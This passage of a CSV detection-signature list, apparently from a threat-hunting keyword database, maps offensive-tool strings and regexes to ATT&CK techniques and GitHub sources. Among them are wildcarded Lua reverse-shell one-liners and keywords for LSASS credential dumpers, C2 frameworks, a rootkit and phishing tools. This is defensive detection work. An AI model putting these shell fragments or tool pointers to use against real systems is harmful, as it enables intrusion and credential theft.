T1041","TA0011 - TA0010- TA0002","N/A","N/A","C2","https://github.com/0dayCTF/reverse-shell-generator","1","0","N/A","10","10","N/A","N/A","N/A","N/A" "*lua -e*require('socket');*t:connect*os.execute('""powershell"" <&3 >&3 2>&3');*",".{0,1000}lua\s\-e.{0,1000}require\(\'socket\'\)\;.{0,1000}t\:connect.{0,1000}os\.execute\(\'\""powershell\""\s\<\&3\s\>\&3\s2\>\&3\'\)\;.{0,1000}","offensive_tool_keyword","reverse-shell-generator","Reverse Shell Generator","T1105 - T1071.004 - T1016 - T1090 - T1029 - T1041","TA0011 - TA0010- TA0002","N/A","N/A","C2","https://github.com/0dayCTF/reverse-shell-generator","1","0","N/A","10","10","N/A","N/A","N/A","N/A" "*lua -e*require('socket');*t:connect*os.execute('""pwsh"" <&3 >&3 2>&3');*",".{0,1000}lua\s\-e.{0,1000}require\(\'socket\'\)\;.{0,1000}t\:connect.{0,1000}os\.execute\(\'\""pwsh\""\s\<\&3\s\>\&3\s2\>\&3\'\)\;.{0,1000}","offensive_tool_keyword","reverse-shell-generator","Reverse Shell Generator","T1105 - T1071.004 - T1016 - T1090 - T1029 - T1041","TA0011 - TA0010- TA0002","N/A","N/A","C2","https://github.com/0dayCTF/reverse-shell-generator","1","0","N/A","10","10","N/A","N/A","N/A","N/A" "*lua -e*require('socket');*t:connect*os.execute('""zsh"" <&3 >&3 2>&3');*",".{0,1000}lua\s\-e.{0,1000}require\(\'socket\'\)\;.{0,1000}t\:connect.{0,1000}os\.execute\(\'\""zsh\""\s\<\&3\s\>\&3\s2\>\&3\'\)\;.{0,1000}","offensive_tool_keyword","reverse-shell-generator","Reverse Shell Generator","T1105 - T1071.004 - T1016 - T1090 - T1029 - T1041","TA0011 - TA0010- TA0002","N/A","N/A","C2","https://github.com/0dayCTF/reverse-shell-generator","1","0","N/A","10","10","N/A","N/A","N/A","N/A" "*lua -e*require('socket');*t:connect*os.execute('sh -i <&3 >&3 2>&3');*",".{0,1000}lua\s\-e.{0,1000}require\(\'socket\'\)\;.{0,1000}t\:connect.{0,1000}os\.execute\(\'sh\s\-i\s\<\&3\s\>\&3\s2\>\&3\'\)\;.{0,1000}","offensive_tool_keyword","reverse-shell-generator","Reverse Shell Generator","T1105 - T1071.004 - T1016 - T1090 - T1029 - T1041","TA0011 - TA0010- TA0002","N/A","N/A","C2","https://github.com/0dayCTF/reverse-shell-generator","1","0","N/A","10","10","N/A","N/A","N/A","N/A" "*lua5.1 -e*require(""socket"")*tcp:connect*io.popen*receive()*send()*",".{0,1000}lua5\.1\s\-e.{0,1000}require\(\""socket\""\).{0,1000}tcp\:connect.{0,1000}io\.popen.{0,1000}receive\(\).{0,1000}send\(\).{0,1000}","offensive_tool_keyword","reverse-shell-generator","Reverse Shell Generator","T1105 - T1071.004 - T1016 - T1090 - T1029 - T1041","TA0011 - TA0010- TA0002","N/A","N/A","C2","https://github.com/0dayCTF/reverse-shell-generator","1","0","N/A","10","10","N/A","N/A","N/A","N/A" "*luckystrike.ps1*",".{0,1000}luckystrike\.ps1.{0,1000}","offensive_tool_keyword","luckystrike","A PowerShell based utility for the creation of malicious Office macro documents.","T1566 - T1059 - T1027","TA0002 - TA0003 - TA0040","N/A","N/A","Exploitation tools","https://github.com/curi0usJack/luckystrike","1","1","N/A","10","10","1087","238","2017-11-03T17:52:13Z","2016-09-22T18:57:50Z" "*Luct0r/KerberOPSEC*",".{0,1000}Luct0r\/KerberOPSEC.{0,1000}","offensive_tool_keyword","KerberOPSEC","OPSEC safe Kerberoasting in C#","T1558.003","TA0006 - TA0007","N/A","N/A","Credential Access","https://github.com/Luct0r/KerberOPSEC","1","1","N/A","10","2","185","22","2022-06-14T18:10:25Z","2022-01-07T17:20:40Z" "*LUgsLS1IT1NU*",".{0,1000}LUgsLS1IT1NU.{0,1000}","offensive_tool_keyword","C2 related tools","Cooolis-ms is a code execution tool that includes Metasploit Payload Loader. Cobalt Strike External C2 Loader. and Reflective DLL injection. Its positioning is to avoid some codes that we will execute and contain characteristics in static killing. and help red team personnel It is more convenient and quick to switch from the Web container environment to the C2 environment for further work.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","N/A","C2","https://github.com/Rvn0xsy/Cooolis-ms","1","1","N/A","10","10","884","137","2023-10-20T14:34:33Z","2019-03-31T14:23:57Z" "*luijait/PwnKit*",".{0,1000}luijait\/PwnKit.{0,1000}","offensive_tool_keyword","POC","exploitation of CVE-2021-4034","T1210","N/A","N/A","N/A","Exploitation tools","https://github.com/luijait/PwnKit-Exploit","1","1","N/A","N/A","1","82","15","2022-02-07T15:42:00Z","2022-01-26T18:01:26Z" "*luks2john.py*",".{0,1000}luks2john\.py.{0,1000}","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","9291","1993","2024-04-30T12:58:37Z","2011-12-16T19:43:47Z" "*lures create *",".{0,1000}lures\screate\s.{0,1000}","offensive_tool_keyword","gophish","Combination of evilginx2 and GoPhish","T1565-002 - T1565-003 - T1565-012 - T1110 - T1056-001 - T1113","TA0002 - TA0003","N/A","N/A","Credential Access - Collection","https://github.com/fin3ss3g0d/evilgophish","1","0","N/A","N/A","10","1475","287","2024-05-01T19:00:30Z","2022-09-07T02:47:43Z" "*LVAsLS1QT1JU*",".{0,1000}LVAsLS1QT1JU.{0,1000}","offensive_tool_keyword","C2 related tools","Cooolis-ms is a code execution tool that includes Metasploit Payload Loader. Cobalt Strike External C2 Loader. and Reflective DLL injection. Its positioning is to avoid some codes that we will execute and contain characteristics in static killing. and help red team personnel It is more convenient and quick to switch from the Web container environment to the C2 environment for further work.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","N/A","C2","https://github.com/Rvn0xsy/Cooolis-ms","1","1","N/A","10","10","884","137","2023-10-20T14:34:33Z","2019-03-31T14:23:57Z" "*LW8sLS1vcHRpb25z*",".{0,1000}LW8sLS1vcHRpb25z.{0,1000}","offensive_tool_keyword","C2 related tools","Cooolis-ms is a code execution tool that includes Metasploit Payload Loader. Cobalt Strike External C2 Loader. and Reflective DLL injection. Its positioning is to avoid some codes that we will execute and contain characteristics in static killing. and help red team personnel It is more convenient and quick to switch from the Web container environment to the C2 environment for further work.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","N/A","C2","https://github.com/Rvn0xsy/Cooolis-ms","1","1","N/A","10","10","884","137","2023-10-20T14:34:33Z","2019-03-31T14:23:57Z" "*LWIsLS1idWNrZXQ=*",".{0,1000}LWIsLS1idWNrZXQ\=.{0,1000}","offensive_tool_keyword","C2 related tools","Cooolis-ms is a code execution tool that includes Metasploit Payload Loader. Cobalt Strike External C2 Loader. and Reflective DLL injection. Its positioning is to avoid some codes that we will execute and contain characteristics in static killing. and help red team personnel It is more convenient and quick to switch from the Web container environment to the C2 environment for further work.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","N/A","C2","https://github.com/Rvn0xsy/Cooolis-ms","1","1","N/A","10","10","884","137","2023-10-20T14:34:33Z","2019-03-31T14:23:57Z" "*LWYsLS1maWxl*",".{0,1000}LWYsLS1maWxl.{0,1000}","offensive_tool_keyword","C2 related tools","Cooolis-ms is a code execution tool that includes Metasploit Payload Loader. Cobalt Strike External C2 Loader. and Reflective DLL injection. Its positioning is to avoid some codes that we will execute and contain characteristics in static killing. and help red team personnel It is more convenient and quick to switch from the Web container environment to the C2 environment for further work.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","N/A","C2","https://github.com/Rvn0xsy/Cooolis-ms","1","1","N/A","10","10","884","137","2023-10-20T14:34:33Z","2019-03-31T14:23:57Z" "*LXAsLS1waWQ=*",".{0,1000}LXAsLS1waWQ\=.{0,1000}","offensive_tool_keyword","C2 related tools","Cooolis-ms is a code execution tool that includes Metasploit Payload Loader. Cobalt Strike External C2 Loader. and Reflective DLL injection. Its positioning is to avoid some codes that we will execute and contain characteristics in static killing. and help red team personnel It is more convenient and quick to switch from the Web container environment to the C2 environment for further work.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","N/A","C2","https://github.com/Rvn0xsy/Cooolis-ms","1","1","N/A","10","10","884","137","2023-10-20T14:34:33Z","2019-03-31T14:23:57Z" "*LXAsLS1wYXlsb2Fk*",".{0,1000}LXAsLS1wYXlsb2Fk.{0,1000}","offensive_tool_keyword","C2 related tools","Cooolis-ms is a code execution tool that includes Metasploit Payload Loader. Cobalt Strike External C2 Loader. and Reflective DLL injection. Its positioning is to avoid some codes that we will execute and contain characteristics in static killing. and help red team personnel It is more convenient and quick to switch from the Web container environment to the C2 environment for further work.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","N/A","C2","https://github.com/Rvn0xsy/Cooolis-ms","1","1","N/A","10","10","884","137","2023-10-20T14:34:33Z","2019-03-31T14:23:57Z" "*LXUsLS11cmk=*",".{0,1000}LXUsLS11cmk\=.{0,1000}","offensive_tool_keyword","C2 related tools","Cooolis-ms is a code execution tool that includes Metasploit Payload Loader. Cobalt Strike External C2 Loader. and Reflective DLL injection. Its positioning is to avoid some codes that we will execute and contain characteristics in static killing. and help red team personnel It is more convenient and quick to switch from the Web container environment to the C2 environment for further work.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","N/A","C2","https://github.com/Rvn0xsy/Cooolis-ms","1","1","N/A","10","10","884","137","2023-10-20T14:34:33Z","2019-03-31T14:23:57Z" "*ly4k/Certipy*",".{0,1000}ly4k\/Certipy.{0,1000}","offensive_tool_keyword","ADCSKiller","ADCSKiller is a Python-based tool designed to automate the process of discovering and exploiting Active Directory Certificate Services (ADCS) vulnerabilities. It leverages features of Certipy and Coercer to simplify the process of attacking ADCS infrastructure","T1552.004 - T1003.003 - T1114.002","TA0006 - TA0003 - TA0005","N/A","N/A","Exploitation tools","https://github.com/grimlockx/ADCSKiller","1","1","N/A","N/A","7","680","69","2023-05-19T17:36:37Z","2023-05-19T06:51:41Z" "*ly4k/Certipy*",".{0,1000}ly4k\/Certipy.{0,1000}","offensive_tool_keyword","Certipy","Tool for Active Directory Certificate Services enumeration and abuse","T1555 T1588 T1552","N/A","N/A","N/A","Exploitation tools","https://github.com/ly4k/Certipy","1","1","N/A","10","10","2135","293","2024-04-24T10:28:14Z","2021-10-06T23:02:40Z" "*ly4k/PassTheChallenge*",".{0,1000}ly4k\/PassTheChallenge.{0,1000}","offensive_tool_keyword","PassTheChallenge","Recovering NTLM hashes from Credential Guard","T1003 - T1555.002","TA0006 - TA0005","N/A","N/A","Exploitation tools","https://github.com/ly4k/PassTheChallenge","1","1","N/A","9","4","318","23","2022-12-26T01:09:18Z","2022-12-26T00:56:40Z" "*lyncsmash*",".{0,1000}lyncsmash.{0,1000}","offensive_tool_keyword","lyncsmash","a collection of tools to enumerate and attack self-hosted Skype for Business and Microsoft Lync installations","T1580 - T1201 - T1071 - T1110 - T1078","TA0043 - TA0006 - TA0008","N/A","N/A","Exploitation tools","https://github.com/nyxgeek/lyncsmash","1","1","N/A","8","4","328","69","2023-05-03T19:07:11Z","2016-05-20T04:32:41Z" "*lyncsmash.git*",".{0,1000}lyncsmash\.git.{0,1000}","offensive_tool_keyword","lyncsmash","a collection of tools to enumerate and attack self-hosted Skype for Business and Microsoft Lync installations ","T1190 - T1087 - T1110","TA0006 - TA0007","N/A","N/A","Credential Access","https://github.com/nyxgeek/lyncsmash","1","1","N/A","8","4","328","69","2023-05-03T19:07:11Z","2016-05-20T04:32:41Z" "*lyncsmash.log*",".{0,1000}lyncsmash\.log.{0,1000}","offensive_tool_keyword","lyncsmash","a collection of tools to enumerate and attack self-hosted Skype for Business and Microsoft Lync installations ","T1190 - T1087 - T1110","TA0006 - TA0007","N/A","N/A","Credential Access","https://github.com/nyxgeek/lyncsmash","1","1","N/A","8","4","328","69","2023-05-03T19:07:11Z","2016-05-20T04:32:41Z" "*lyncsmash.py*",".{0,1000}lyncsmash\.py.{0,1000}","offensive_tool_keyword","lyncsmash","a collection of tools to enumerate and attack self-hosted Skype for Business and Microsoft Lync installations ","T1190 - T1087 - T1110","TA0006 - TA0007","N/A","N/A","Credential Access","https://github.com/nyxgeek/lyncsmash","1","1","N/A","8","4","328","69","2023-05-03T19:07:11Z","2016-05-20T04:32:41Z" "*lyncsmash-master*",".{0,1000}lyncsmash\-master.{0,1000}","offensive_tool_keyword","lyncsmash","a collection of tools to enumerate and attack self-hosted Skype for Business and Microsoft Lync installations ","T1190 - T1087 - T1110","TA0006 - TA0007","N/A","N/A","Credential Access","https://github.com/nyxgeek/lyncsmash","1","1","N/A","8","4","328","69","2023-05-03T19:07:11Z","2016-05-20T04:32:41Z" "*LyncSniper*",".{0,1000}LyncSniper.{0,1000}","offensive_tool_keyword","LyncSniper","LyncSniper is a tool for penetration testing Lync and Skype for Business deployments hosted either on premise or in Office 365","T1566 - T1574 - T1210 - T1596","TA0002 - TA0011 - TA0009","N/A","N/A","Exploitation tools","https://github.com/mdsecactivebreach/LyncSniper","1","0","N/A","7","1","9","3","2017-04-11T08:38:28Z","2017-06-12T10:56:58Z" "*-m * -d * -w * --top-web-ports*",".{0,1000}\-m\s.{0,1000}\s\-d\s.{0,1000}\s\-w\s.{0,1000}\s\-\-top\-web\-ports.{0,1000}","offensive_tool_keyword","DOME","DOME - A subdomain enumeration tool","T1583 - T1595 - T1190","TA0011 - TA0009","N/A","N/A","Network Exploitation tools","https://github.com/v4d1/Dome","1","0","N/A","N/A","5","451","62","2024-02-07T09:12:17Z","2022-02-20T15:09:40Z" "*-m dumpert *",".{0,1000}\-m\sdumpert\s.{0,1000}","offensive_tool_keyword","lsassy","Extract credentials from lsass remotely","T1003.001 - T1021.001 - T1021.002 - T1555.003","TA0006","N/A","N/A","Credential Access","https://github.com/login-securite/lsassy","1","0","N/A","10","10","1911","239","2024-04-18T05:56:30Z","2019-12-03T14:03:41Z" "*-M handlekatz -o *",".{0,1000}\-M\shandlekatz\s\-o\s.{0,1000}","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","0","N/A","10","10","2118","215","2024-05-01T19:24:43Z","2023-09-08T15:36:00Z" "*'M', 'E', 'L', 'T', 'E', 'D', 0*",".{0,1000}\'M\',\s\'E\',\s\'L\',\s\'T\',\s\'E\',\s\'D\',\s0.{0,1000}","offensive_tool_keyword","HVNC","Standalone HVNC Client & Server Coded in C++ (Modified Tinynuke)","T1021.005 - T1071 - T1563.002 - T1219","TA0001 - TA0002 - TA0008","N/A","N/A","RMM","https://github.com/Meltedd/HVNC","1","0","N/A","10","4","395","120","2022-02-14T02:31:56Z","2021-09-03T17:34:44Z" "*'M', 'i', 'n', 'i', 'D', 'u', 'm', 'p', 'W', 'r', 'i', 't', 'e', 'D', 'u', 'm', 'p'*",".{0,1000}\'M\',\s\'i\',\s\'n\',\s\'i\',\s\'D\',\s\'u\',\s\'m\',\s\'p\',\s\'W\',\s\'r\',\s\'i\',\s\'t\',\s\'e\',\s\'D\',\s\'u\',\s\'m\',\s\'p\'.{0,1000}","offensive_tool_keyword","LetMeowIn","A sophisticated covert Windows-based credential dumper using C++ and MASM x64.","T1003 - T1055.011 - T1148","TA0006","N/A","N/A","Credential Access","https://github.com/Meowmycks/LetMeowIn","1","0","N/A","10","3","263","44","2024-04-20T03:59:46Z","2024-04-09T16:33:27Z" "*'M','i','n','i','D','u','m','p','W','r','i','t','e','D','u','m','p'*",".{0,1000}\'M\',\'i\',\'n\',\'i\',\'D\',\'u\',\'m\',\'p\',\'W\',\'r\',\'i\',\'t\',\'e\',\'D\',\'u\',\'m\',\'p\'.{0,1000}","offensive_tool_keyword","DumpThatLSASS","Dumping LSASS by Unhooking MiniDumpWriteDump by getting a fresh DbgHelp.dll copy from the disk","T1003 - T1055.011 - T1027 - T1564.001","TA0006 - TA0005","N/A","N/A","Credential Access","https://github.com/peiga/DumpThatLSASS","1","0","N/A","10","1","29","81","2022-09-24T22:39:04Z","2022-09-24T22:41:19Z" "*M.i.m.i.k.a.t.z*",".{0,1000}M\.i\.m\.i\.k\.a\.t\.z.{0,1000}","offensive_tool_keyword","kubesploit","Kubesploit is a cross-platform post-exploitation HTTP/2 Command & Control server and agent written in Golang","T1021.001 - T1027 - T1071.001 - T1059.006","TA0005 - TA0002 - TA0011","N/A","N/A","C2","https://github.com/cyberark/kubesploit","1","1","N/A","10","10","1077","109","2023-04-08T08:32:23Z","2021-02-09T15:54:23Z" "*M.i.m.i.k.a.t.z*",".{0,1000}M\.i\.m\.i\.k\.a\.t\.z.{0,1000}","offensive_tool_keyword","merlin","Merlin is a post-exploit Command & Control (C2) tool also known as a Remote Access Tool (RAT)","T1219 - T1105 - T1071 - T1090 - T1055 - T1047","TA0005 - TA0002 - TA0003 - TA0006 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Ne0nd0g/merlin","1","1","N/A","10","10","4934","792","2024-04-23T05:14:51Z","2017-01-06T11:18:20Z" "*m00zh33/golang_c2*",".{0,1000}m00zh33\/golang_c2.{0,1000}","offensive_tool_keyword","golang_c2","C2 written in Go for red teams aka gorfice2k","T1071 - T1021 - T1090","TA0011 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/m00zh33/golang_c2","1","1","N/A","10","10","6","8","2019-03-18T00:46:41Z","2019-03-19T02:39:59Z" "*m0nad/Diamorphine*",".{0,1000}m0nad\/Diamorphine.{0,1000}","offensive_tool_keyword","Diamorphine","LKM rootkit for Linux Kernels","T1547.006 - T1548.002 - T1562.001 - T1027","TA0003 - TA0004 - TA0005 - TA0006 - TA0007","N/A","N/A","Persistence","https://github.com/m0nad/Diamorphine","1","1","N/A","10","10","1664","407","2023-09-20T10:56:06Z","2013-11-06T22:38:47Z" "*m0rv4i/SharpCookieMonster*",".{0,1000}m0rv4i\/SharpCookieMonster.{0,1000}","offensive_tool_keyword","SharpCookieMonster","This C# project will dump cookies for all sites. even those with httpOnly/secure/session","T1539 - T1606","TA0008 - TA0002","N/A","N/A","Exploitation tools","https://github.com/m0rv4i/SharpCookieMonster","1","1","N/A","N/A","2","197","45","2023-03-15T09:51:09Z","2020-01-22T18:39:49Z" "*m3f157O/combine_harvester*",".{0,1000}m3f157O\/combine_harvester.{0,1000}","offensive_tool_keyword","combine_harvester","Rust in-memory dumper","T1055 - T1055.001 - T1055.012","TA0005 - TA0006","N/A","N/A","Defense Evasion","https://github.com/m3f157O/combine_harvester","1","1","N/A","10","2","106","17","2023-07-26T07:16:00Z","2023-07-20T07:37:51Z" "*m4ll0k/SecretFinder*",".{0,1000}m4ll0k\/SecretFinder.{0,1000}","offensive_tool_keyword","secretfinder","SecretFinder is a python script based on LinkFinder written to discover sensitive data like apikeys - accesstoken - authorizations - jwt..etc in JavaScript files","T1083 - T1081 - T1113","TA0003 - TA0002 - TA0007","N/A","N/A","Credential Access","https://github.com/m4ll0k/SecretFinder","1","1","N/A","N/A","10","1749","335","2024-03-17T17:15:56Z","2020-06-08T10:50:12Z" "*m8sec/nullinux*",".{0,1000}m8sec\/nullinux.{0,1000}","offensive_tool_keyword","nullinux","Internal penetration testing tool for Linux that can be used to enumerate OS information/domain information/ shares/ directories and users through SMB.","T1087 - T1016 - T1077 - T1018","TA0007 - TA0006","N/A","N/A","Discovery","https://github.com/m8sec/nullinux","1","1","N/A","7","6","551","100","2022-08-12T01:56:15Z","2016-04-28T16:45:02Z" "*MAAD_Attack.ps1*",".{0,1000}MAAD_Attack\.ps1.{0,1000}","offensive_tool_keyword","MAAD-AF","MAAD Attack Framework - An attack tool for simple fast & effective security testing of M365 & Azure AD. ","T1078.001 - T1552.001 - T1558.001 - T1003.001 - T1110.003 - T1555.003 - T1558.002 - T1087.001 - T1087.002 - T1214.001 - T1562.001 - T1088 - T1559.001 - T1106 - T1204","TA0006 - TA0004 - TA0008 - TA0007 - TA0002 - TA0005","N/A","N/A","Network Exploitation tools","https://github.com/vectra-ai-research/MAAD-AF","1","1","N/A","8","4","333","52","2024-04-04T22:56:00Z","2023-02-09T02:08:07Z" "*MAAD_Config.ps1*",".{0,1000}MAAD_Config\.ps1.{0,1000}","offensive_tool_keyword","MAAD-AF","MAAD Attack Framework - An attack tool for simple fast & effective security testing of M365 & Azure AD. ","T1078.001 - T1552.001 - T1558.001 - T1003.001 - T1110.003 - T1555.003 - T1558.002 - T1087.001 - T1087.002 - T1214.001 - T1562.001 - T1088 - T1559.001 - T1106 - T1204","TA0006 - TA0004 - TA0008 - TA0007 - TA0002 - TA0005","N/A","N/A","Network Exploitation tools","https://github.com/vectra-ai-research/MAAD-AF","1","1","N/A","8","4","333","52","2024-04-04T22:56:00Z","2023-02-09T02:08:07Z" "*MAAD_Mitre_Map.ps1*",".{0,1000}MAAD_Mitre_Map\.ps1.{0,1000}","offensive_tool_keyword","MAAD-AF","MAAD Attack Framework - An attack tool for simple fast & effective security testing of M365 & Azure AD. ","T1078.001 - T1552.001 - T1558.001 - T1003.001 - T1110.003 - T1555.003 - T1558.002 - T1087.001 - T1087.002 - T1214.001 - T1562.001 - T1088 - T1559.001 - T1106 - T1204","TA0006 - TA0004 - TA0008 - TA0007 - TA0002 - TA0005","N/A","N/A","Network Exploitation tools","https://github.com/vectra-ai-research/MAAD-AF","1","1","N/A","8","4","333","52","2024-04-04T22:56:00Z","2023-02-09T02:08:07Z" "*MAADInitialization.ps1*",".{0,1000}MAADInitialization\.ps1.{0,1000}","offensive_tool_keyword","MAAD-AF","MAAD Attack Framework - An attack tool for simple fast & effective security testing of M365 & Azure AD. ","T1078.001 - T1552.001 - T1558.001 - T1003.001 - T1110.003 - T1555.003 - T1558.002 - T1087.001 - T1087.002 - T1214.001 - T1562.001 - T1088 - T1559.001 - T1106 - T1204","TA0006 - TA0004 - TA0008 - TA0007 - TA0002 - TA0005","N/A","N/A","Network Exploitation tools","https://github.com/vectra-ai-research/MAAD-AF","1","1","N/A","8","4","333","52","2024-04-04T22:56:00Z","2023-02-09T02:08:07Z" "*mac.changer on*",".{0,1000}mac\.changer\son.{0,1000}","offensive_tool_keyword","bettercap","The Swiss Army knife for 802.11 - BLE - IPv4 and IPv6 networks reconnaissance and MITM attacks.","T1046 - T1190 - T1059 - T1053 - T1001.002 - T1110.001 - T1113 - T1132 - T1048","TA0010 - TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0009 - TA0011 - TA0010","N/A","N/A","Network Exploitation tools","https://github.com/bettercap/bettercap","1","0","N/A","N/A","10","15702","1412","2024-04-08T07:48:24Z","2018-01-07T15:30:41Z" "*mac_dirty_cow.*",".{0,1000}mac_dirty_cow\..{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - 